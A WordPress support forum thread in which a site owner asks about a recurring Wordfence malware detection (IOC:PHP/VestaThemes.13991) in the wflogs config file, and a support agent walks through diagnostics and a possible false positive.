IOC:PHP/VestaThemes.13991 malware scan

  • Resolved SJ

    (@sunsta)


    1 year, 3 months ago

    Hi, I`m running in to a reoccurring issue after the Wordfence malware scan. There is no theme or plugin installed from vestathemes.com. I have selected to delete this file 3 times, successfully – but then it comes back again – how do I remove this permanently? Please see details below:

    Filename: public_html/wp-content/wflogs/config-synced.php

    Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: vestathemes.com

    The issue type is: IOC:PHP/VestaThemes.13991
    Description: VestaThemes.com is a nulled theme/plugin distributor. Their plugins/themes contain malware, therefore your site is likely to be infected

Viewing 9 replies - 1 through 9 (of 9 total)
  • Plugin Support wfpeter

    (@wfpeter)

    Hi @sunsta, thanks for reaching out about this.

    It does seem strange on the face of things that a vestathemes detection would happen in Wordfence’s wflogs folder, but I’d need to look into it a little closer. This scan result would also show up in your diagnostic report, which I can check and pass on to our Threat Intelligence team if I can’t see a clear cause myself.

    You can send that to wftest @ wordfence . com directly from the link at the top of the Wordfence > Tools > Diagnostics page. Then click on “Send Report by Email”. Please add your forum username where indicated and respond here after you have sent it.

    NOTE: It should look as follows – Screenshot of Tools > Diagnostic > Send by Email

    Many thanks,
    Peter.

    Thread Starter SJ

    (@sunsta)

    Thank you so much for your reply, Peter ??
    I have sent the diagnostics report via email as instructed.
    Appreciate the support!

    Plugin Support wfpeter

    (@wfpeter)

    Hi @sunsta, thanks for sending that over.

    I’m seeing 0 scan issues in that diagnostic which would suggest that has now been cleared. Are you not seeing the message in your latest site scan or have you ignored/repaired from the last time?

    Thanks again,
    Peter.

    Thread Starter SJ

    (@sunsta)

    Hi Peter,

    I have deleted the file earlier, before I reached out to support today.

    The thing is, I delete the file successfully, but the next day I get another notification:

    Critical Problems:
    * File appears to be malicious or unsafe: wp-content/wflogs/config-synced.php

    Plugin Support wfpeter

    (@wfpeter)

    Hi @sunsta, thank-you for clarifying.

    Our Threat Intelligence team recommend sending your current config-synced.php to samples @ wordfence . com. They should be able to analyze the file and get back to you if there are any recommended actions from there.

    We don’t believe a threat is likely in this case as “Advanced blocking” settings are included that file. If your site has blocked Referers, User-Agents, etc. including “vestathemes.com”, it may be down to our signature being too sensitive, but can be easily rectified once we know for sure.

    Thanks for your assistance,
    Peter.

    Thread Starter SJ

    (@sunsta)

    Hi Peter, thank you for your feedback. I will send it through. Is there anything specific I should mention or reference?

    Plugin Support wfpeter

    (@wfpeter)

    Hi @sunsta,

    You can reference this topic and a small summary so they know the context around why you’re sending the file, but that should be sufficient to take it from there.

    Peter.

    Thread Starter SJ

    (@sunsta)

    Hi Peter,

    Your assistance is so much appreciated, thank you ??

    Plugin Support wfpeter

    (@wfpeter)

    No worries @sunsta, thanks for getting in touch. I will close this topic now as you should receive further correspondence directly – but you’re welcome to start a new topic any time you have Wordfence questions in future.

    Peter.

Viewing 9 replies - 1 through 9 (of 9 total)
  • The topic ‘IOC:PHP/VestaThemes.13991 malware scan’ is closed to new replies.